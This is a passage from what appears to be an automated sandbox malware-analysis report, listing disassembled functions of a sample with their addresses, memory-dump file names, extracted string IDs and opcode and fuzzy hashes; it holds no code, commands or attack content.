                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~$!k
                                                                                                                                                                                                                                                                • API String ID: 0-3376054287
                                                                                                                                                                                                                                                                • Opcode ID: 80b0b32f718cd60834cc263462e1141d60b8431a5a0488f70a27a385f4bc8dec
                                                                                                                                                                                                                                                                • Instruction ID: a0c4b7a7854b031ad5fa5f554d50e38e2812a4367930355ff5e671042cdb364f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80b0b32f718cd60834cc263462e1141d60b8431a5a0488f70a27a385f4bc8dec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD1D3F3E106204BF3444D29DC99366B692EBD4320F2F823D9A899B7C5ED7E5C0A4385
                                                                                                                                                                                                                                                                Function 003E4270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                                • Opcode ID: 1d2db428f7f5102f82a8f5256b32263e909813f51436040fa5fda616a19ed86d
                                                                                                                                                                                                                                                                • Instruction ID: ae7051e8a1896b643dfe6de32fa464a75629580fa55e5a424d119cff04bb15e9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d2db428f7f5102f82a8f5256b32263e909813f51436040fa5fda616a19ed86d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAD1DEB5908394DFD721CF15D841B9BBBE4AB98304F144A2DF9999B3C2D375E908CB82
                                                                                                                                                                                                                                                                Function 0044C066 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: u=o
                                                                                                                                                                                                                                                                • API String ID: 0-3464535994
                                                                                                                                                                                                                                                                • Opcode ID: 98f74d8b78a80cfdd8369453c23a695962129b93ec5bb691dc42415ff658dde2
                                                                                                                                                                                                                                                                • Instruction ID: 1e5f8423e398215886224e35b198d57ae0c53af7f084fcb3e4c1c0fae5aa157d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98f74d8b78a80cfdd8369453c23a695962129b93ec5bb691dc42415ff658dde2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F1E1B3F116244BF3545979DC98366B683DBD4320F2F823C9E99A77C5D87E5C0A4284
                                                                                                                                                                                                                                                                Function 004B035B Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Y`=}
                                                                                                                                                                                                                                                                • API String ID: 0-2613711147
                                                                                                                                                                                                                                                                • Opcode ID: a6b8234e5c1d341d021b2bbc1fe8004b180bf454746a21a13ac7485591d67bf2
                                                                                                                                                                                                                                                                • Instruction ID: aa9cbc69c8d9aa9f155258c600a1380149d76731b83ec68356fdffa2d3019cef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6b8234e5c1d341d021b2bbc1fe8004b180bf454746a21a13ac7485591d67bf2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F1C0F3F146118BF3445E29DC94366B692EBD4320F2F863C9A989B7C4D97E9C068385
                                                                                                                                                                                                                                                                Function 004DE442 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 0-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 69e9ed893c34dcf5c979d38e7cdc1399d306fb111d956db24cd5179001915539
                                                                                                                                                                                                                                                                • Instruction ID: 8ee52a0694c897f0a008ece45df6797da8e67bc14caaedb7cf9717195d3f9390
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69e9ed893c34dcf5c979d38e7cdc1399d306fb111d956db24cd5179001915539
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15D188B3F2252547F3544839CC683A266839BE4321F2F82788E5D6B7C5ED7E5D0A5384
                                                                                                                                                                                                                                                                Function 0040B170 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                                                                                                                                                                                                                                • Instruction ID: c7148fe4508fe2ed95867d796b332cee85c6ab2f8d10e8da205195218ab03dbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90C138B2A083056BD7258E25C89076BB7D5EF84314F18897EE8959B3C2E738DC4487DA
                                                                                                                                                                                                                                                                Function 0048F568 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~/K]
                                                                                                                                                                                                                                                                • API String ID: 0-2682434281
                                                                                                                                                                                                                                                                • Opcode ID: 8d5d5c139c39f4649e648d7af2f1436cf5a453c6d40786a939fe19441b476837
                                                                                                                                                                                                                                                                • Instruction ID: 385004873e7e15aea7b7cc09d9d05327a28b30541cb23497dd319928a6b2884c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d5d5c139c39f4649e648d7af2f1436cf5a453c6d40786a939fe19441b476837
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07C199B7F1162547F3944838CC983A265829B95321F2F82788EACBBBC5DC7E5D0A53C4
                                                                                                                                                                                                                                                                Function 004D007C Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: S+
                                                                                                                                                                                                                                                                • API String ID: 0-4116795713
                                                                                                                                                                                                                                                                • Opcode ID: fdf6052b8861883151cce004e0c6cd34e888f4c48f3d35fff5657d0ac31b91a3
                                                                                                                                                                                                                                                                • Instruction ID: 5016873c7c4d4059af55009ae4a870e5ad77ae046907b3d1290d1d3e78d06b9f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdf6052b8861883151cce004e0c6cd34e888f4c48f3d35fff5657d0ac31b91a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAB19BB3F106258BF3544D78CD993A26682DB94320F2F82388F99AB7C5D97E9C095384
                                                                                                                                                                                                                                                                Function 0048F090 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: F,|
                                                                                                                                                                                                                                                                • API String ID: 0-710049258
                                                                                                                                                                                                                                                                • Opcode ID: 39ac8f5f6fc54d7d61e55121f71e10f47e0fa04a06d1d1b9fa8ce9a3de128f23
                                                                                                                                                                                                                                                                • Instruction ID: 727d8337ec129982cb1cc8402404ed5e18a88d50f18dbecd6f6b7c7b24f557a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ac8f5f6fc54d7d61e55121f71e10f47e0fa04a06d1d1b9fa8ce9a3de128f23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99B18DB3F112358BF3604D69DC983A272929BA5321F2F82788E5C6B7C5E97E5C0953C4
                                                                                                                                                                                                                                                                Function 004B2021 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                                • API String ID: 0-498629140
                                                                                                                                                                                                                                                                • Opcode ID: 1a2a254be4b8be410c1a6ee14a77ea163c9e72763a6a75db3bd7cb0ad92aa8b5
                                                                                                                                                                                                                                                                • Instruction ID: d83ee2a76e08ff514781e8ef09dae9c2e34df3ca3e736b13c6c699f48e71ffbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a2a254be4b8be410c1a6ee14a77ea163c9e72763a6a75db3bd7cb0ad92aa8b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7919DB3F116254BF3448D39CC583A27683EBD5311F2F81788A499B7C9D97EAD0A5384
                                                                                                                                                                                                                                                                Function 0049D42B Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
